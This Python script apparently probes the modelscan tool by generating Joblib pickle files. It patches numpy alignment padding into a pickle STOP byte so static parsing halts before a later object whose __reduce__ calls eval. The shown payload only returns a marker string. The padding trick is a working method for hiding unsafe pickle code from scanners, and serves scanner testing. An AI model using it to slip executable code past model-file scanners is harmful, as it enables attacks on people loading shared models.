| |
| """Generate benign Joblib artifacts for numpy padding traversal checks.""" |
|
|
| from __future__ import annotations |
|
|
| import argparse |
| import io |
| import json |
| import os |
| import pathlib |
| import pickletools |
| import re |
| import shutil |
| import subprocess |
| from dataclasses import dataclass |
| from typing import Any |
|
|
| import joblib |
| import numpy as np |
|
|
|
|
| MARKER = "BENIGN_JOBLIB_MARKER" |
| PICKLE_STOP = 0x2E |
| JOBLIB_PADDING_BYTE = b"\xff" |
| PICKLE_PROTOCOL = 4 |
|
|
|
|
| class BenignEval: |
| """Benign unsafe-global marker: eval returns a constant string only.""" |
|
|
| def __reduce__(self) -> tuple[Any, tuple[str]]: |
| return (eval, (repr(MARKER),)) |
|
|
|
|
| @dataclass(frozen=True) |
| class PaddingPatch: |
| offset: int |
| original_length: int |
| patched_length: int |
| inserted_bytes: int |
| array_data_offset_before: int |
| array_data_offset_after: int |
|
|
|
|
| def dump_joblib_bytes(value: Any) -> bytes: |
| buffer = io.BytesIO() |
| joblib.dump(value, buffer, compress=0, protocol=PICKLE_PROTOCOL) |
| return buffer.getvalue() |
|
|
|
|
| def find_first_numpy_padding(data: bytes) -> int: |
| ops: list[tuple[int, str]] = [] |
| try: |
| for opcode, _arg, pos in pickletools.genops(data): |
| ops.append((pos, opcode.name)) |
| except ValueError as exc: |
| match = re.search(r"position (\d+)", str(exc)) |
| if not match: |
| raise RuntimeError(f"could not locate pickle parse stop: {exc}") from exc |
| offset = int(match.group(1)) |
| if not ops or ops[-1][1] != "BUILD": |
| raise RuntimeError( |
| "pickle parsing did not stop immediately after a numpy wrapper BUILD" |
| ) |
| if b"numpy_array_alignment_bytes" not in data[:offset]: |
| raise RuntimeError("joblib numpy alignment metadata was not found") |
| return offset |
|
|
| raise RuntimeError("expected raw numpy array bytes to interrupt pickle parsing") |
|
|
|
|
| def patch_padding_to_stop(data: bytes) -> tuple[bytes, PaddingPatch]: |
| offset = find_first_numpy_padding(data) |
| original_length = data[offset] |
| if not 1 <= original_length <= 64: |
| raise RuntimeError(f"unexpected joblib padding length: {original_length}") |
| if original_length >= PICKLE_STOP: |
| raise RuntimeError( |
| f"padding length {original_length} does not need a STOP-byte expansion" |
| ) |
|
|
| inserted = PICKLE_STOP - original_length |
| patched = ( |
| data[:offset] |
| + bytes([PICKLE_STOP]) |
| + (JOBLIB_PADDING_BYTE * inserted) |
| + data[offset + 1 :] |
| ) |
| patch = PaddingPatch( |
| offset=offset, |
| original_length=original_length, |
| patched_length=PICKLE_STOP, |
| inserted_bytes=inserted, |
| array_data_offset_before=offset + 1 + original_length, |
| array_data_offset_after=offset + 1 + PICKLE_STOP, |
| ) |
| return patched, patch |
|
|
|
|
| def write_bytes(path: pathlib.Path, data: bytes) -> None: |
| path.parent.mkdir(parents=True, exist_ok=True) |
| path.write_bytes(data) |
|
|
|
|
| def load_status(path: pathlib.Path) -> dict[str, Any]: |
| try: |
| value = joblib.load(path) |
| except Exception as exc: |
| return { |
| "status": "error", |
| "error": f"{type(exc).__name__}: {str(exc).splitlines()[0]}", |
| } |
|
|
| return { |
| "status": "ok", |
| "type": type(value).__name__, |
| "repr": repr(value), |
| "marker_found": contains_marker(value), |
| } |
|
|
|
|
| def contains_marker(value: Any) -> bool: |
| if isinstance(value, str): |
| return value == MARKER |
| if isinstance(value, np.ndarray): |
| return False |
| if isinstance(value, (bytes, bytearray, memoryview)): |
| return False |
| if value is None: |
| return False |
| if isinstance(value, (bool, int, float, complex)): |
| return False |
| if isinstance(value, dict): |
| return any(contains_marker(item) for item in value.values()) |
| if isinstance(value, (list, tuple)): |
| return any(contains_marker(item) for item in value) |
| return False |
|
|
|
|
| def opcode_positions(data: bytes, opcode_name: str, start: int = 0) -> list[int]: |
| positions: list[int] = [] |
| for opcode, _arg, pos in pickletools.genops(data[start:]): |
| if opcode.name == opcode_name: |
| positions.append(start + pos) |
| return positions |
|
|
|
|
| def opcode_offsets(data: bytes) -> dict[str, int | None]: |
| offsets: dict[str, int | None] = { |
| "builtins_string": find_bytes(data, b"builtins"), |
| "eval_string": find_bytes(data, b"eval"), |
| "marker_string": find_bytes(data, MARKER.encode()), |
| "final_stop_opcode": data.rfind(bytes([PICKLE_STOP])), |
| } |
| return offsets |
|
|
|
|
| def find_bytes(data: bytes, needle: bytes) -> int | None: |
| offset = data.find(needle) |
| return offset if offset >= 0 else None |
|
|
|
|
| def modelscan(path: pathlib.Path, command: pathlib.Path | None) -> dict[str, Any]: |
| if command is None: |
| return {"status": "skipped"} |
| if not command.exists(): |
| return {"status": "missing", "command": str(command)} |
|
|
| completed = subprocess.run( |
| [ |
| str(command), |
| "-p", |
| str(path), |
| "-r", |
| "json", |
| "--show-skipped", |
| ], |
| text=True, |
| capture_output=True, |
| env={**os.environ, "COLUMNS": "20000"}, |
| check=False, |
| ) |
| stdout = completed.stdout.strip() |
| json_start = stdout.find("{") |
| parsed: dict[str, Any] |
| if json_start >= 0: |
| try: |
| parsed = json.loads(stdout[json_start:]) |
| except json.JSONDecodeError: |
| parsed = {"parse_error": stdout} |
| else: |
| parsed = {"parse_error": stdout} |
|
|
| summary = parsed.get("summary") if isinstance(parsed, dict) else None |
| return { |
| "status": "ok" if "parse_error" not in parsed else "parse_error", |
| "returncode": completed.returncode, |
| "modelscan_version": summary.get("modelscan_version") if summary else None, |
| "total_issues": summary.get("total_issues") if summary else None, |
| "errors": parsed.get("errors") if isinstance(parsed, dict) else None, |
| } |
|
|
|
|
| def summarize( |
| case: str, |
| path: pathlib.Path, |
| modelscan_command: pathlib.Path | None, |
| extra_offsets: dict[str, Any] | None = None, |
| ) -> dict[str, Any]: |
| data = path.read_bytes() |
| offsets: dict[str, Any] = opcode_offsets(data) |
| if extra_offsets: |
| offsets.update(extra_offsets) |
| return { |
| "case": case, |
| "path": str(path), |
| "size": len(data), |
| "joblib_load": load_status(path), |
| "offsets": offsets, |
| "modelscan": modelscan(path, modelscan_command), |
| } |
|
|
|
|
| def main() -> int: |
| parser = argparse.ArgumentParser() |
| parser.add_argument( |
| "output_dir", |
| nargs="?", |
| type=pathlib.Path, |
| default=pathlib.Path("corpus/joblib_numpy_padding_probe"), |
| ) |
| parser.add_argument( |
| "--modelscan-command", |
| type=pathlib.Path, |
| default=None, |
| ) |
| parser.add_argument("--skip-modelscan", action="store_true") |
| args = parser.parse_args() |
|
|
| modelscan_command = None if args.skip_modelscan else resolve_modelscan_command( |
| args.modelscan_command |
| ) |
|
|
| control_path = args.output_dir / "control_direct.joblib" |
| candidate_path = args.output_dir / "candidate_numpy_array_then_payload_patched.joblib" |
|
|
| control_bytes = dump_joblib_bytes(BenignEval()) |
| write_bytes(control_path, control_bytes) |
|
|
| array = np.array([PICKLE_STOP, 0, 1, 2, 3, 4, 5, 6], dtype=np.uint8) |
| candidate_bytes = dump_joblib_bytes([array, BenignEval()]) |
| patched_candidate_bytes, patch = patch_padding_to_stop(candidate_bytes) |
| write_bytes(candidate_path, patched_candidate_bytes) |
|
|
| print( |
| json.dumps( |
| summarize( |
| "control_direct", |
| control_path, |
| modelscan_command, |
| { |
| "payload_reduce_opcode_offsets": opcode_positions( |
| control_bytes, |
| "REDUCE", |
| ) |
| }, |
| ), |
| sort_keys=True, |
| ) |
| ) |
| payload_frame_offset = patch.array_data_offset_after + array.nbytes |
| print( |
| json.dumps( |
| summarize( |
| "candidate_numpy_array_then_payload_patched", |
| candidate_path, |
| modelscan_command, |
| { |
| "padding_length_offset": patch.offset, |
| "padding_original_length": patch.original_length, |
| "padding_patched_length": patch.patched_length, |
| "padding_inserted_bytes": patch.inserted_bytes, |
| "array_data_offset_before_patch": patch.array_data_offset_before, |
| "array_data_offset_after_patch": patch.array_data_offset_after, |
| "array_first_byte_after_patch": patched_candidate_bytes[ |
| patch.array_data_offset_after |
| ], |
| "payload_frame_offset_after_patch": payload_frame_offset, |
| "payload_reduce_opcode_offsets_after_patch": opcode_positions( |
| patched_candidate_bytes, |
| "REDUCE", |
| payload_frame_offset, |
| ), |
| }, |
| ), |
| sort_keys=True, |
| ) |
| ) |
| return 0 |
|
|
|
|
| def resolve_modelscan_command(command: pathlib.Path | None) -> pathlib.Path | None: |
| if command is not None: |
| return command |
|
|
| local_command = pathlib.Path(".venv-modelscan/bin/modelscan") |
| if local_command.exists(): |
| return local_command |
|
|
| path_command = shutil.which("modelscan") |
| if path_command is not None: |
| return pathlib.Path(path_command) |
|
|
| return local_command |
|
|
|
|
| if __name__ == "__main__": |
| raise SystemExit(main()) |
|
|